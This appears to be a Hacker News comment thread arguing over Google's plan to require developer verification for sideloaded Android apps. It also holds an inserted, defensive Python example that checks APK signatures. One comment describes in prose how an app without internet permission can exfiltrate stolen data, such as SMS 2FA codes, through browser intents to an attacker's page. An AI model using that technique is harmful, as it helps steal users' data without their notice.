I think there is also still room to legally require a common SW-layer with respective documentation to utilize features of underlying hardware (optional without the shipped OS on top, disconnecting the device from the shipped ecosystem).
This would also make sense in order to prevent e-waste and put this old hardware to better use.
It's crazy to think how much computing power is just added to a drawer or landfill every day, just because there is no reason for the vendor to allow you to repurpose it.
I would e.g. LOVE a "Browser on everything" OS which just provides a Browser OS for outdated hardware, but the only way this could work on scale would be if the device-vendor would be mandated to provide and document the lower layer...
We live in a world where the top chip makers are being shaken down by the US government to keep access to markets because embargoes and tariffs. And where software developers have to have a live feed of what every user is doing to Brussels or be arrested.
The question of how private property, intellectual property and possession/ownership should work is indeed something humanity hasn't properly figured out yet.
But if anything, regular people should have more of the cake.
We have! The only problem is a very limited amount of legal decisions accidentally paved the way for a massive dystopia. In particular, the first sale doctrine [1] solves everything immediately.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
You might be right. We're seeing a paradox of more and more exclusive ownership of property for commercial interests (land, water, airwaves, orbits) and fewer and fewer exclusive ownership for individuals (rented homes, licensed software, subscriptions etc). I too think we're still in a transition stage and humanity has yet to figure this thing out.
Not always. There have been car manufacturers that sold vehicles with features only enabled by a subscription. You may buy a car with heated seats, but the heated seats only work if the manufacturer enables them.
The heated seat is an edge case, but there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car (e.g. replace the brakes with some home-grown solution), as it can put yourself and others in danger, and I see no evil in that being enforced by the government. A more IT-related example might be what radio frequencies can we use - if anyone could spam the whole spectrum, we would lose more than from the "freedom" of being able to do that.
> there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car
In at least two European countries that I know of (but probably in all of them) cars need to pass periodic technical inspection to be allowed on the road. Brakes are tested, among other things.
Technical inspections are mandatory across the board in all of the European Union, although the rules (such as the interval between inspections) may differ between countries. The minimum is every two years, some countries do yearly. This is actually governed by a European mandate.
Considering the same law is used to strike a 3 hour GPU documentary over a ~30 second clip, I think it serves to corporate pretty well.
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a blog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
Am I the only one that found that to be a reasonable edge case?
The seat heating was apparently shortening the life of the leather seats. It's cheaper to include heated seats in all cars, than it is to maintain 2 different sets of production. The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled.
Likewise, if you manually enabled the seat heaters, then complained that the seats were falling apart quickly, having given you a legal out to get that feature enabled in warranty, would not have to replace your seats for free.
Not to mention, they apparently already ditched the subscription over backlash.
> The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled
I never heard of car-manufacturers periodically replacing seats within warranty because of the wear of the material, regardless of being "more frequently" or not. This sounds like a massive oversight in product-design.
Of all the cases I know, the customer had to bear the cost of such "wear and tear" cases.
I would want the ability to change that. I actually think I can mess with that on my car.
> enabling the nominal power of your car instead of handicapping it by default?
Big topic for me. My car has a DPF, and appears to have been geared such that despite containing an automatic DPF burn process, the engine never quite reaches the required temperature, so I need to perform manual burns.
I have straight up asked the dealer for a method to enable the auto burn process, manually. And have asked if there's a retune available, to make the gearing just a little bit less efficient, giving me more power and more engine heat.
The issue, pretty much verbatim from their head regional diesel mechanic is that any modifications of that nature would fuck the emissions standards they had to limbo under. So it's categorically denied. They also issued me with stern official warnings that anything I do to make the car more reliable may also void my warranty. And the unofficial advice I have received is that the DPF is "f*cked mate" and to "get the petrol hybrid before the government forces it to wear a similar PPF"
The car also very suspiciously moderates the engine output unrelated to gearing/tune. Just sometimes underperforms at random. I believe it's computational again, like you say, handicapping it for emissions reasons.
These things are largely optional for me, but I won't mess with them too much until I am out of warranty.
> I would want the ability to change that. I actually think I can mess with that on my car.
Yes, generally you can disable on demand, but Volkswagen now sells the feature as a subscription. So you need to pay to enable. Maybe this is because it reduces the lifespan of the LEDs. Who knows.
> handicapping it for emissions reasons.
Volkswagen sells you another subscription for that now, at least for their electric vehicles. You can buy the option if you want your EV to perform as it's designed.
Emissions is a completely different beast. However their 140HP and 170HP TFSI engines had no different parts rather than the mapping.
Manipulating engines in a way which alters their carbon footprint is a sensitive topic, and while I was positive towards diesel systems, the particulate matter they emit, the fog they cause (see Paris photos, it's eye opening) and German engineering at its finest (i.e. Dieselgate scandal) soured me from diesel's automotive applications, big time, permanently.
This is the same argument people make between Apple and Android.
Can I use an Android phone without using Google? Yes, of course you can. There are plenty of secure OS's like Graphene, Lineage, Calyx and many others. Do people really care enough to use them? Hardly any, which proves my point.
Same thing here. Most people will just pay the fee to get the seats. Some might just opt out and not get them. Others will shop around and find some legacy cars that are older that have them but don't require a subscription.
At the end of the day? There's ALWAYS a choice. How hard do you want to look to avoid the subscription? Is it really worth your time and effort? Some would say yes, the vast majority really DGAF. People have been lulled into not caring about stuff like personal privacy and having a say in what's being peddled to you.
I see no other way than regulation to force the two to provide drivers and manuals for alternative OS makers.
We should've nipped it with Apple, but there was so much _whatabout_ing that the conversation always got sidetracked with assertions about the free market and what not. It turns out, there is no free market, and we're just living in someone's managed device walled garden.
That's not what it's ever actually about. You're buying a disingenuous framing that pins blame on the bottom when all these harmful trends come from the top. This isn't to protect grandma, it's to protect Google. This is always what happens when you allow pockets of power with interests misaligned from those of most people. The pockets of power get their way, and people are worse off.
The thing is, even if Google has a hidden motive in this case, the prevailing public morality doesn't allow you to argue against a measure designed to protect the weakest and poorest among us. Once a vulnerable group has been invoked, the public stops caring about their rights, the cost-benefit balance and most other rational concerns.
I think the phenomenon is most visible in the United Kingdom. Not just with respect to the recent age verification measures, but also with respect to the government's recent financial misadventures.
Of course it's a disingenuous framing. A certain kind of person is both attracted to power and deathly afraid of people voicing unapproved opinions "outside their kitchens".
Things can have multiple justifications, some public, some not: some conscious, some not. Central control and a feeling that a parental figure is in control of the tribe primes, at a primal level, a certain kind of person to like an idea. The specific post-hoc justification is almost incidental.
That said, such things need a semblance of legitimacy to work. It'd be much harder to crack down on general purpose computing under the guise of safety if we had cultural antibodies against safetyism in general.
It's just not possible to prevent mistakes while letting people color outside the lines. Most brilliant ideas look like stupidity at first. I want to live in a world that biases towards discovery over safety.
There is not much to discover from e.g. not using seatbelts. There is absolutely a need to protect a population from itself which should cover certain stuff, while not others.
> There is absolutely a need to protect a population from itself which should cover certain stuff
No, there isn't. I'd much rather live in a world where we were able to make our own decisions about personal safety, regardless of how poor those decisions are.
There's a direct line from mandating seatbelts to mandating developer certificates. If you accept in one domain that it's legitimate for power to reduce freedom to protect people from themselves, you'll accept it in every domain.
Look: in order for a mandate to be justifiable, it needs to at least provide superlinear benefit to linear adoption. That is, it has to solve a coordination problem.
Do seat belts solve any coordination problem? Do they benefit anyone but those wearing them? No. Therefore, the state has no business mandating them no matter the harm prevented.
A certain kind of person thinks differently though. He sees "harm" and relishes the prospect of "protecting" people from that "harm". They don't recognize the legitimacy of individual bad decisions. The self is just another person trying to hurt you. This kind of person would turn the whole world into a rubberized playground if he could.
Sure. You will have the right to root, unless on a device with a locked bootloader. /s
Let's just call it what it is and what we all want. "The right to modify". It doesn't give you the right to copy, so it will never break any law protecting intellectual property.
That doesn't make sense. How do you meet your own needs and desires if you can't use your own property the way you want?
And isn't the point in this very situation that people simply can't buy what they want because Google and Apple are a duopoly and now Google is going to follow the path of restricting what you can do with your own property?
If I were in the 0.01%, savings wouldn't be a thing. I wouldn't even need a home. Just go around staying wherever I like for as long as I like doing whatever I want. I wouldn't really care about what google or apple does with their devices, who attacked or defeated whom and all that bs because I wouldn't be in survival mode.
At least this is probably how people in charge of enshittification think like.
This is based on the false assumption that the free market solves every problem.
But the reality (which was correctly identified by Adam Smith himself) is that the effort required to enter a market can sometimes be so high, that we practically end up with oligopolies, see mobile OSs. They require a network effect to make sense, so the entry cost is not just developing the product, but also to somehow convince basically every other player to consider you a target platform - which is a cyclical problem that you can't just bootstrap yourself into. Even Microsoft failed at it, even though they were paying hefty sums to companies for apps working on their OS.
If this is a thing then the solution they offer is incorrect. A big giant red screen: “warning the identity of this application developer has not been verified and this could be an application stealing your data, etc” would have worked.
What they want is to get rid of apps like YouTube Vanced that are making them lose money (and other Play Store apps)
> What they want is to get rid of apps like YouTube Vanced
I think it is also very telling where they're rolling out first. Brazil, Indonesia, Thailand, and Singapore.
It felt weird that the official press release was quoting entities from these countries, as if it should give confidence to the rest of the world. I can't imagine what these countries would want with apps that can be traced back to a government id...
Vanced and such is more of a First World/Western issue. I don't think you're wrong but I got a strong gut feeling there's other pressures in the works. Just something doesn't smell right...
In addition to the other perspectives already offered here, warning screens such as the one you propose were already shown for sideloaded apps, and these screens worked against Google in their lawsuit with Epic Games. So that's another contributing factor for the policy we're discussing.
If a giant red warning saying 'THIS APP MAY BE MALWARE' doesn't stop someone, then they've either made an informed choice to proceed or it's willful negligence. In other words, users aren't 'trained' to ignore warnings; they're simply being willfully negligent.
This is something laughable that Apple does. Anytime you install something from Github it'll make you click a few extra boxes. And their tightening down of things also ends up making people look for third party software in the first place. All this really does is, like you said, teach people to ignore warnings.
The way we allow paternalistic tech companies to train the consumer to abdicate personal responsibility is going to bite us in the ass sooner or later. I'm betting on sooner.
It's such a simple and effective solution that could be implemented overnight and 'help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users personal data' tomorrow. Mission accomplished, internet saved, and everyone's happy just like a fairy tale out of the early 2000s.
People have no "control" over their own device if they have malware on it. The weirdo incoherent tech-chauvinism of "control" and "freedom" evidenced all over this thread is one of the most obnoxious trends on HN.
The funny thing is Stallman started his fight like half a century ago and on regular days Hacker News shits on him eating something off of his foot and not being polished and diplomatic, and loves practical aspects of Corporate Open Source and gratis goodies and doesn't particularly care about Free Software.
On this day suddenly folks come out of the woodwork advocating for half baked measures to achieve what Stallman portrayed but they still hardly recognize this was EXACTLY his concern when he started the Free Software movement.
It's possible to believe both that Stallman is over the top and that stuff like this Google action is bad, and even to be right on both. It's even easier to believe that Stallman has had some good ideas but is still a deeply flawed human being, and has also incidentally not been the most effective advocate for his own ideals.
It is possible, sure, but I have a feeling it goes unrecognized how prophetic and precise his concerns were, and that this is very similar to his original issue with the closed-source printer software he was not allowed to fix, and he does not get credit for his predictions, as people simply pass by, and not connect it to the Free Software issue, when issues like this happen; meanwhile he takes all the downsides of being brash and anti-corporate, which is taken advantage of by the Corporate Open Source crowd.
I shit on Stallman because he fights quite vocally against singular they and neopronouns, and invents his own replacement for it. A cause no one needs his opinions on and a solution no one in the community wants.
It just seems needlessly pedantic and irritating to go to a minority group and say, "you minority group are doing your culture wrong". It, perhaps much more problematically, encourages others to feel like they should drive by trans and non binary communities and tell those communities about how they are doing language wrong.
He also said he was "skeptical that voluntary pedophilia harms children." There's a lot to unpack there, but that's a pretty deeply fucked up thing to say.
The foot stuff is a quirk. Kind of an icky quirk, but whatever. Those other critiques are very reasonable reasons to be uncomfortable lionizing rms.
I think his proposal to use "per" instead of "they" actually makes a lot of sense, because "they" is very confusing in a lot of contexts, because it's a word already used for another function. I don't see how you perceive that as something negative.
The quote about pedophilia is concerning indeed, but I think that rather stems from ignorance about the issues than promoting pedophilia. It's easy to shit on such things and wokely dismiss someone's entire opinion, which I find a bit weak.
The guy quite obviously is diversely talented. A computer genius, but well below generally agreed upon levels of mental deficiency in areas that most people care about.
This is really bad. I think that most people on HN will agree with that.
The problem is that most normal people (HN is not normal - mostly for the better) don't even understand what sideloading is - let alone actually care.
How can we fix this?
(aside from making people care - apathy enables so many political problems in the current age, but it's such a huge problem that this definitely isn't going to be the impetus to fix it)
This certainly won't solve the problem, but I would at least like to banish the term "side load", which is a kind of Orwellian word that takes something everyone used to do all the time and makes it sound obscure and a bit nefarious. Maybe we, the tech literate, can start calling sideloading a "free install" or something. When asked, we can clarify that the 'free' stands for both freedom, and not paying middlemen 30%.
This is a great point. Not sure if it’s possible, would be great if there was some way to reclaim the notion of installing software as a general practice, regardless of whether a computer is “mobile” or “desktop”.
Like people still download software packages from the web on Windows, MacOS, and Linux… right? Maybe hard to grasp for the kids that grew up with tablets with no notion of a file system, idk
People install games from Steam or the Epic Store on their computers without Microsoft preventing that or taking a cut all the time (not for lack of trying. I know). But somehow, in the mobile world, we went with total lockdowns and platform extortion as the rule?
> People install games from Steam or the Epic Store on their computers without Microsoft preventing that
Microsoft wishes they could have the level of platform control that Google/Apple on mobiles have.
It's pure luck that the IBM-compatible PC was not locked down and restricted, because at the time IBM had not thought of it as being important. When it became clear that it was a lost profit opportunity, the cat was already out of the bag and so IBM had no choice.
Microsoft repeated the same "mistake". But Apple learnt, and Google also from Apple.
I agree that this is a horrible step in the wrong direction but in terms of the solution I have a different take.
I don't think that making "normal" people "care" about sideloading is the answer, because a) it's impossible and b) political change doesn't happen through "normal" people anyway, all political and regulatory change is driven via smaller and motivated groups of people.
The problem is fundamentally that there's a duopoly on mobile OSes that has tons of market power and if they want to dictate a change like "you can no longer install unapproved software," they can just do it.
The solution is to walk away from that duopoly, to suck it up and just stop using their products. We fortunately are able to do this (for now) on desktop and running Linux in 2025 is better than it's ever been, and more people are doing it.
To get Linux or some alternative on phones is a big task, and if you make the switch you're going to lose a lot. But most of what has no desktop equivalent is addictive social media garbage that you should get rid of anyway. The biggest thing I'm concerned about is the state of banking and OTP/2FA.
I think we need to fight for universal electronic access to the financial system as a right without a need for gatekeepers like Apple or Google. In some countries it's already the case that at many businesses you must use your phone to make payments, cash is gone, cards are dying, and you must therefore agree to Apple or Google's rules to use your phone. This is truly how freedom and democracy will die if we allow it. This is way bigger for "normal" people than technical concepts like sideloading. People on the left should inherently understand the importance to liberty of having the right as an individual to buy and sell without some megacorp's permission. For people on the right, well, remember the Bible's "Mark of the beast..."
Secondarily we need to fight for the enforcement of anti-trust laws, which half of HN doesn't seem to even know exist, or feels are in some way unfair, even though they are the cause of these problems. Government needs to reach in and rearrange markets that are dominated by one or two players, it needs to forcefully restructure those companies so that they lose their market power and can no longer force citizens to obey their will. We've done it before, such as ending company towns where you were forced to use the company's scrip at the company's shop to buy living essentials. It's worked, we need to do it again.
I can do banking and otp at home with a 100 Euro phone that I use only for that. FB, TikTok, Instagram, etc, never ever installed them on my devices.
The problem is that I want to make calls, SMSes, use WhatsApp and Telegram, Maps and OSMAnd, NewPipe, VLC, Syncthing and a few others on the phone I carry with me.
And to make matters worse I don't want a huge, thick and heavy brick like every Linux phone I read about. I'm on a Samsung A40 now and it's not easy to find a replacement with similar size and weight.
How are you going to buy things when you leave home?
In the country I live in, which is a highly online and highly mobile first country, a sizeable minority of businesses no longer accept cash. A few no longer even accept cards.
At these businesses, there is only one way to pay, which is to pull out your phone, and initiate a transaction through your mobile banking app, you scan a QR from the vendor and approve the transfer.
Mobile banking is so ubiquitous that often these businesses don't even have signage outlining their payment policies, or it's tiny and hard to find.
Some banks do not have an online banking website, the only way to access your money and make a payment is to use the Android or iOS app on an unrooted device, or physically go to a branch or ATM.
You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
It's prevalent enough that being outside of your home without an unrooted Google or Apple operating system physically on your person is a significant impediment to buying basic things, like a meal.
Apple and Google will, through a variety of technical changes, seek to make this the case in all of the world, and in some countries they'll succeed. So the important question now is: how will it go down in the next 10 years in your country? How far under their control is your society going to fall?
Banking, money and payments. Limiting those in the name of security is how they will get you on everything else.
They will take away cash and cards and there will only be payment apps, on approved secure OSes which you can't "tamper" with (aka install "unauthorized" software like VLC or a Youtube alternative on), or else the payments apps stop working.
They will take away SMS OTP and there will only be TOTP, because it's more secure. Then they will replace the OTP with a facial scan, because it's more secure, people were being social engineered into giving someone those numbers over the phone, etc.
This is all in process. They don't even hide it, they just say it's for security. It is already happening in countries that are highly online and highly phone-centric.
> You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
Note that this is likely illegal, even though I'm sure it's very common in certain places, and arguing about legal tender laws is not how you want to spend every meal of course.
But, in principle, in most countries at least, businesses and private citizens are obligated to accept the country's currency to discharge debts. They're free to have an upfront no cash policy, and refuse to do business with you if you try to pay with cash, for example making you leave all your groceries at the checkout counter. But if they claim that you have a debt to them, such as a meal you've already eaten and now must pay for, they must accept any form of the country's currency, such as cash, as a means of you paying that debt off.
> I can do banking and otp at home with a 100 Euro phone that I use only for that.
That doesn't solve anything, though. If Google revoked your Google account and refused to open a new one, you'd be SOL - you'd either have to buy an iPhone, or move banks until you find one that gives you a physical TOTP (since many just have apps already, but those apps don't run unless downloaded from the Google or Apple stores).
Telegram's clients are open-source, and there's plenty of non-official ones, but for other proprietary messengers you're SOL.
Hard to believe at this point that these messengers used to use open standard protocols, and you could send messages from Google Talk to Facebook once.
> I don't want a huge, thick and heavy brick like every Linux phone I read about
While I understand your point, are you even going to notice after a couple of weeks of daily driving? Let’s not underestimate our ability to get used to things.
Valve has managed something similar with SteamOS as well as Proton built on Wine to make Windows games run on Linux, performing as good as or often better than an actual (modern) Windows install.
It's the mobile hardware drivers (such as for the modems and 5G etc) that are likely roadblocks - these hardware manufacturers probably have some sort of OEM agreements, and so cannot open-source these drivers for all devices.
I would wish that mobile devices' specs and hardware drivers are all available, so that I am not dependent on the manufacturer supplying a compatible OS.
I agree with you idealistically, but practically, creating an entirely new mobile OS with market share competitive with the existing two is an unbelievably massive challenge. It'd probably be just about as easy to get people to care about sideloading in the first place.
Remember how Android used to be an open source project and how we had Google backing AOSP? I think it's time we maintain the latest fork and just use that instead.
That only solves the OS side of things, but doesn't give you a good ecosystem. Unfortunately an increasingly bigger number of apps rely on Google services and attestations, meaning you need a Google approved software to run them.
Is AOSP no longer a thing? I've been using GrapheneOS for a few years and admittedly lost track of AOSP, I just assumed it was still a thing despite Google generally wanting to control more and more.
Google now only drop through source code after a release, not during development. Also, much AOSP functionality has been moved to Google's Play Services which is closed source.
That's not the problem. It's the bootloader locked hardware and the TPM anti-"tampering" security verification that more and more apps require.
It's not just the OS makers. They're also responding to the demand of companies and governments to control their users through them. They will not say "no".
We used to have strong consumer protection advocates on both sides of the Atlantic, and those consumer protection advocates used to influence laws and regulation which forced corporations to stop doing anti-consumer stuff like this. Those days can return with enough organized labor and solidarity among the working classes.
I had to do some light research on Wiki, but it looks like Firefox OS was supposed to fill part of this void. Sadly, it was not successful, and the project lost funding and support from Mozilla. I think if Mozilla could not do it, it seems hard to imagine there is an open source org with more talent and money than Mozilla who can make it work.
Sailfish tried and failed. Various Linux distro also tried and failed even harder. Consumers at large just aren't interested in anything other than iOS and Android.
The problem is - Linux (outside on server land and maybe SteamOS) is everything but (regular) user friendly.
When people buy a new phone they expect a smooth experience without any major inconveniences and uniform UI. And apps. Lots of apps. Full of features and mature UI. Linux mostly have none of it.
Users need a new feature or a new power to justify transition. Learning of new OS is not free. Someone should reuse Android UI, but upgrade the OS to full Linux.
There's already open source OSes that run on phones that aren't based on Android.
Off the top of my head there's a Debian based one, a Fedora based one, webOS, PostmarketOS, probably others. Wouldn't be that difficult but yeah, the cost of entry is still probably tens of millions.
This is also no long term solution. GrapheneOS can't diverge from Google android too much, otherwise modern apps stop working. And Google will definitely go for alternative roms next.
> most normal people... don't even understand what sideloading is
Actually, they understand it just fine. The concept is very simple too.
Before this change you could install Android apps without registering your passport/driving license with Google.
After this change you will have to tell Google your real name and home address to install anything on your Android device. This is all. It can take a convoluted form of registering Google account or a more direct form of sending Google your identity documents to confirm "developer privileges". But you will no longer be able to use non-hacked Android devices to install anything without doing those steps.
P.S. I recall that some people still believe that they can create a Google account without giving Google your personal details, phone etc. This is simply a self-delusion. If Google does not immediately demand you to cough up a phone number under pretense of "suspicious activity", that's because they already know who you are (you probably told them yourself by registering another account elsewhere).
No, "burner SIM cards" aren't real. This is just another form of self-delusion, this time architected by US security agencies. You don't become anonymous by using those, you become watched.
Define "normal people".
Due to Chinese phones and sanctions and other geopolitical bullshit a significant part of the world is forced to use alternative app stores already. Yes, these people are very aware of "sideloading". (Due to Google's own previous moronic foot-shooting policy.)
Turn people onto sideloaded apps. Show them Revanced and NewPipe, show them system-wide ad blockers and bloatware removal and every other thing Google doesn't want plebs to use.
People don't care about "apk side-loading," they care about apps. Hook them on forbidden apps, and they'll raise hell when they can't side-load them anymore.
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
It's never about security (at least not the user's security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or your bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried: playstore 1 has only well vetted authors and apps. Playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.
The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.
Security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.
> Attackers convincing users to side-load malware is a thing.
Sure. It’s also not Google’s problem.
It’s not Victorinox’s problem if someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.
Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
If they don't do that then their reputation will suffer and governments might take notice. So, in practice, big companies do have to care about their users, not individually but in aggregate.
That's a bad analogy. No one is complaining about Google providing Android security updates.
This is like a car manufacturer preventing the installation of all unapproved aftermarket accessories by claiming they're protecting you from a stalker installing a tracker on your car.
I don’t actually think it’s that bad. If all of a sudden we started hearing an awful lot about Android phones having viruses, to the point where almost everyone had a friend who got a virus on their Android, I think the market would actually shift. We’d probably see more people moving to iPhones.
> Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
Didn't Kia go over a decade without caring or improving until the Kia Boys stuff?
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
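The check described in the comment above, tying a package name to its registered signing certificate, as an added example (not code from the thread or from Google): it reads the report of `apksigner verify --print-certs` and compares certificate digests with a pin list. The package name, digests and sample reports are constructed, and the report line format is an assumption about that tool's output.

```python
import re
import subprocess

# Constructed pin list: package name -> SHA-256 digests of the signing
# certificates registered for it. The package and digest are sample values.
REGISTERED_DIGEST = "ab" * 32
PINNED_CERTS = {"com.example.localapp": {REGISTERED_DIGEST}}

# Line format assumed from `apksigner verify --print-certs` output.
SIGNER_RE = re.compile(
    r"^Signer #\d+ certificate SHA-256 digest: ([0-9A-Fa-f:]+)\s*$", re.M
)


def normalize_fp(fingerprint):
    """Return a digest as 64 lowercase hex characters, or raise ValueError."""
    cleaned = fingerprint.replace(":", "").strip().lower()
    if not re.fullmatch(r"[0-9a-f]{64}", cleaned):
        raise ValueError(f"not a SHA-256 digest: {fingerprint!r}")
    return cleaned


def signer_digests(report):
    """Extract every signer's certificate SHA-256 digest, in signer order."""
    return [normalize_fp(m) for m in SIGNER_RE.findall(report)]


def check_apk(package, report, pins=PINNED_CERTS):
    """Decide whether an APK claiming `package` was signed by a registered key."""
    allowed = pins.get(package)
    if not allowed:
        # No trust on first use: an unregistered package is refused.
        return False, "no certificate registered for this package"
    try:
        found = signer_digests(report)
    except ValueError as exc:
        return False, f"malformed digest in tool output ({exc})"
    if not found:
        # Unsigned APK, failed verification, or an empty report.
        return False, "no verified signer reported"
    unknown = [d for d in found if d not in allowed]
    if unknown:
        return False, "signed by unregistered certificate " + unknown[0]
    return True, "all signers match the registered certificate"


def run_apksigner(apk_path):
    """Run apksigner; return its report, or "" when verification fails."""
    proc = subprocess.run(
        ["apksigner", "verify", "--print-certs", apk_path],
        capture_output=True, text=True,
    )
    return proc.stdout if proc.returncode == 0 else ""


def sample_report(digest):
    """Build a constructed report in the assumed apksigner format."""
    return (
        "Signer #1 certificate DN: CN=Example Local App\n"
        f"Signer #1 certificate SHA-256 digest: {digest}\n"
        f"Signer #1 certificate SHA-1 digest: {'12' * 20}\n"
    )


# Constructed inputs: the original APK, and the same package re-signed
# by someone else after modification.
GENUINE_REPORT = sample_report(REGISTERED_DIGEST)
REPACKED_REPORT = sample_report("cd" * 32)

if __name__ == "__main__":
    for name, report in [("genuine", GENUINE_REPORT), ("repacked", REPACKED_REPORT)]:
        print(name, check_apk("com.example.localapp", report))
```

The pin only means something when the digest comes from a tool that has verified the APK's signature over the file's contents; a digest printed on a download page says nothing about the file you received.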
> Typical issue - I want to download an app that's not available "in my country" - because I'm on a holiday and want to try some local app,
The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issues MS had with GitHub (sanctions and KYC checks).
There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.
Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not surprising that they don't let you deny this one, when they don't even show it in the store.
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps
Or that they still refuse to sandbox the Play Store.
It's easy to see that there's a pattern on what they are copying from GrapheneOS.
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> The main thing this permission would be used for would be blocking ads.
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what it's worth.
